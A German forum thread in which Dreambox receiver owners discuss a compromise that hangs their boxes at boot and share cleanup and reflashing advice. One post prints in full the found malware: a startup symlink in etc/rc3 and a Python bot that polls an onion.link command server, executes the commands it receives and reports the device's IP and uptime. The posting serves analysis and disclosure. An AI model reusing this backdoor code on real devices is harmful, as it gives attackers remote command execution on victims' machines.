Via telnet:

init 4 && sleep 15 && enigma2.sh

bringt die Box tasächlich wieder ans laufen,
Neustart hab ich noch nicht probiert.
VPN ist weiterhin aktiviert um vom www. auf die Dream zu kommen.
Portfreigabe ebenfalls noch aktiviert um im Heimnetz über IPAD auf die Dream zuzugreifen.
Das zahlreiche User Zeitgleich das selbe Problem haben.......

Dass in so einem Fall die Box wieder läuft, wäre meine geringste Sorge und nicht sofort nach außen alles dicht zumachen, nicht neu zu flashen und nicht sämtliche im Netzwerk zugänglichen Passwörter zu ändern, ist schon ziemlich blauäugig.

Hallo deepblue2000,
habe es nochmals überprüft, der Absturz war gegen 16:30 danach habe ich versucht neu zu starte dann neu geflahst und versucht meine Sicherung einzuspielen. Und da hatte ich noch zweimal einen Hänger.
Beim ersten Absturz wurde warsch. kein Log geschrieben, danach zwei. Leider dachte ich das Log gehört zum ersten Fehler.

Ordner habe ich keine ausergewöhnlichen gefunden.

Ports habe ich geschlossen, Passwort hatte ich schon vergeben
Neu geflahst
Box läuft wieder "Musste alles komplett neu einrichten"

Danke erst mal.

Nachdem ich auch von der Problematik betroffen war habe ich mir die Sache mal genauer angeschaut.

Auf der Box fand sich in

etc/rc3
S9990x.sh als LINK auf -> /0x/startup.sh

im Ordner /0x die bereits im Thema genannten Daten

startup.sh

mit Inhalt
#!/bin/sh
/usr/bin/python /0x/0x.py

0x.py

mit Inhalt
import urllib2
import os,sys,time,base64,random

done = 0

x = ""

botversion = "__v0.1__"

def sysstat():
os.system("uptime > /tmp/uptimestat")
a = file("/tmp/uptimestat").readlines()
uptime = a[0].replace(" ","_").replace("\n","")
os.system("rm /tmp/uptimestat")
return uptime



while done == 0:
try:
ran = str(random.random())
ran2 = str(random.random())
ran3 = str(random.random())
ran4 = str(random.random())
ran5 = str(random.random())
ran6 = str(random.random())
ran7 = str(random.random())
ips = urllib2.urlopen("http://api.ipify.org?format=json").read()
content_b = urllib2.urlopen("http://lkz7lmppcmvra6io.onion.link/"+ips.split('"')[3]+"_GETCMD_"+ran+ran2+ran3+ran4+ran5+ran6+ran7).read()
contentt = base64.b64decode(content_b)
if contentt == x:
time.sleep(120)
elif "reportback" in contentt:
ran = str(random.random())
ran2 = str(random.random())
ran3 = str(random.random())
ran4 = str(random.random())
ran5 = str(random.random())
ran6 = str(random.random())
ran7 = str(random.random())
ips = urllib2.urlopen("http://api.ipify.org?format=json").read()
urllib2.urlopen("http://lkz7lmppcmvra6io.onion.link/"+ips.split('"')[3]+botversion+"_REPORT_"+ran+ran2+ran3+ran4+ran5+ran6+ran7)
time.sleep(120)
elif "getsysstat" in contentt:
sysinfo = sysstat()
ran = str(random.random())
ran2 = str(random.random())
ran3 = str(random.random())
ips = urllib2.urlopen("http://api.ipify.org?format=json").read()
urllib2.urlopen("http://lkz7lmppcmvra6io.onion.link/"+ips.split('"')[3]+botversion+"_REPORT_SYSSTAT_"+sysinfo++ran+ran2+ran3)
else:
x = contentt
os.system(contentt)
time.sleep(20)
except:
time.sleep(120)
pass

Lösungsansatz welcher bei mir funktionierte.
Während die Box im Bootprozess "hängt", ist das Netzwerk bereits gestartet.
Per FTP oder Telnet ist daher eine Verbindung zur der Box möglich.

Deshalb zunächst den Ordner "0x" löschen (geht per FTP und Telnet).
Wenn dieser Ordner weg ist kann die Box bereits wieder problemlos starten.

Jedoch ist auch das Startscript in etc/rc3 "S9990x.sh" zu löschen.
Dies geht allerdings nur per Telnet da es sich hier um einen Link handelt.

Zudem fand ich heraus das das (vermutlich) zuvor gesicherte Webinterface auf HTTP Port 80 nun ohne Passwort erreichbar war.
Per Port 443 war es nach wie vor gesichert.
Ich bin mir nicht ganz sicher ob ich hier für diese unsichere Konfiguration selber verantwortlich bin, oder ob diese Einstellung ebenfalls fremdgesteuert manipuliert wurde.
Das solltet Ihr noch prüfen.

Vorerst spare ich mir die Neuinstallation und werde mal loggen was genau auf der Dreambox so abgeht, - und was hier im schlimmsten Fall den Ordner auch wieder neu erzeugt.
Bisher ist er nicht wieder aufgetaucht.

Es könnte sich daher um automatisierte Angriffe nach Zufallsprinzip handeln, welche auf das offene Webinterface der Box abzielen und das entsprechende Start-Script + Ordner 0x installiert.
Das würde auch die aktuelle Häufung der Fälle erklären.

Bezüglich des im Script enthaltenen Links "http://lkz7lmppcmvra6io.onion.link" finden sich das hier. - es scheint also was aktuelles zu sein:

skunksworkedp2cg.torhsbrowser.…ml#lkz7lmppcmvra6io.onion

und bei pastebin finden sich seit dem 11. März eine Referenz welches in Teilen exakt dem Inhalt des auf der Box befindlichen 0x.py entspricht.

pastebin.com/PUETs1xJ
Hammerhead

Vorerst spare ich mir die Neuinstallation und werde mal loggen was genau auf der Dreambox so abgeht, -

Da nimmt wer es auf die leichte Schulter...

da hilft nur box neu flashen !
deine box ist mit einem virus/trojaner verseucht.

wer weiss wo er noch überall drin steckt

... oder schlimmer. Wie ich schon sagte, um die Box würde ich mir in diesem Fall die geringsten Sorgen machen und neu flashen ist obligatorisch. Wenn jemand Zugriff auf mein internes Netzwerk hatte, würde ich das definitiv nicht auf die leichte Schulter nehmen.

Aber dann ist auch keine Analyse mehr möglich.
Die Box ist derzeit "dicht" - und es läuft ein Logging..
Sollte sich noch was rühren was nicht dem übliche bzw. gewünschtem Verhalten entspricht so werde ich die Ursache herausfinden.
Nach einem neuflash weiss ich ja dann immer noch nicht ob möglicherweise ein genutztes Plugin /Extension vom Feed mit Schadecode daherkommt und dann alles wieder von vorn beginnt.

Daher wird nun zunächst analysiert und die Ergebnisse werde ich hier mitteilen.

Aber dann ist auch keine Analyse mehr möglich.

Das ist zwar nett das du das machen möchtest aber geht der Selbstschutz nicht vor? (Und das bezieht sich nun auf dein gesamtes Netzwerk)
Ich mein... würde in den nächsten Tagen ein SEK vor deiner Tür stehen und dich wegen Kinderp. Inhalten verhaften... würde es micht nicht wundern.

Grüße

Keine Sorge, ich bin kein Anfänger was IT betrifft und wie ich sagte .. die Box ist dicht und es wird alles im Detail geloggt.
Analyse des Tatherganges ist zudem auch der Grund warum man nach einem Einbruch nicht gleich das eingeschlagene Fenster austauscht und Wohnungsputz macht, bevor nicht alle Spuren professionel gesichert und bewertet wurden.

Ich werde erst zufrieden sein wenn ich den Einruch / Hack 1:1 nachstellen kann.
Bisdahin steht die Box unter besonderer Beobachtung,- und auch das Heimnetz ist nicht in Gefahr,
Der Selbstschutz ist jederzeit gewährleistet.

Weniger technisch versierten Usern empfehle ich jedoch auch das neu flashen.
Jedoch zusätzlich mit dem Hinweise, dass auf keinerlei Sicherung der Altinstallation zurückgegriffen werden soll.
Also mit neu meine ich hier auch neu.

Hammerhead

ich hab 3 8000er und nur auf der box auf der das unstable image drauf ist befanden sich dieser ordner und das script

hm?

dann ist wahrscheinlich nur auf diese Box ein Portforwarding aktiv...

Per Telnet einlogen:



Passwort eingeben und fertig.
Optionen zum Webif findest du in den PluginSettings.


Grüße

so lange keine ports offen sind, ist es egal ob password gesetzt ist oder nicht.

nur werden die "angreifer" eventuell deine dyndns haben und kennen immer deine IP,
vielleicht solltest du die auch tauschen.

per telnet geht das ändern des passwortes aber wie Schnello es geschrieben hat.

passwd
neuespass123
neuespass123

Die Box hat nach dem flashen kein Passwort und ist ungeschützt. Deshalb sollte auch KEIN Portforwarding bestehen für diese Box. Dann ist die Box nur im internen Netzwerk ungeschützt. Nach dem Flashen und dem Eingeben der Netzwerkdaten ist es dann das erste, dass man sich per Telnet einloggt und mit passwd ein Passwort setzt.